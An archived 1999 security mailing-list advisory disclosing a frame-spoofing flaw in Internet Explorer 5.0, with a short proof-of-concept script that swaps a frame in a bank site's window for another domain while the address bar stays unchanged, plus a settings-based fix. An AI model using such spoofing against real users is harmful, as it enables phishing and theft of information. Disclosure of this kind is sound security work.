Default IE 5.0 security settings allow frame spoofing

From: Georgi Guninski (joroat_private)
Date: Tue Nov 30 1999 - 09:53:44 PST

Next message: Brock Tellier: "FreeBSD 3.3 gated-3.1.5 local exploit"

Previous message: Mixter: "serious Qpopper 3.0 vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Default IE 5.0 security settings allow frame spoofing

Disclaimer:
The opinions expressed in this advisory and program are my own and not
of any company.
The usual standard disclaimer applies, especially the fact that Georgi
Guninski
is not liable for any damages caused by direct or  indirect use of the
information or functionality provided by this program.
Georgi Guninski, bears NO responsibility for content or misuse of this
program or any derivatives thereof.

Description:

Internet Explorer 5.0 under Windows 95 (guess other versions are
affected) with its
default security settings allows frame spoofing. The problem is setting
the location of a frame to an arbitrary URL without updating the address
bar.
This vulnerability allows misleading the user he is browsing a trusted
site, while in fact he may be browsing a hostile site which might be
stealing information.

The code is:
----------------------------------------------------------------------------------------
<SCRIPT>
b=window.open("http://www.citybank.com");
function g()
{
b.frames[2].location="http://www.yahoo.com";
}
setTimeout("g()",6000);
</SCRIPT>
----------------------------------------------------------------------------------------


Solution: Set "Navigate sub-frames across different domains" option to
Disable

Demonstration is available at http://www.nat.bg/~joro/msfrspoof.html

Regards,
Georgi Guninski
http://www.nat.bg/~joro

Next message: Brock Tellier: "FreeBSD 3.3 gated-3.1.5 local exploit"
Previous message: Mixter: "serious Qpopper 3.0 vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:15:03 PDT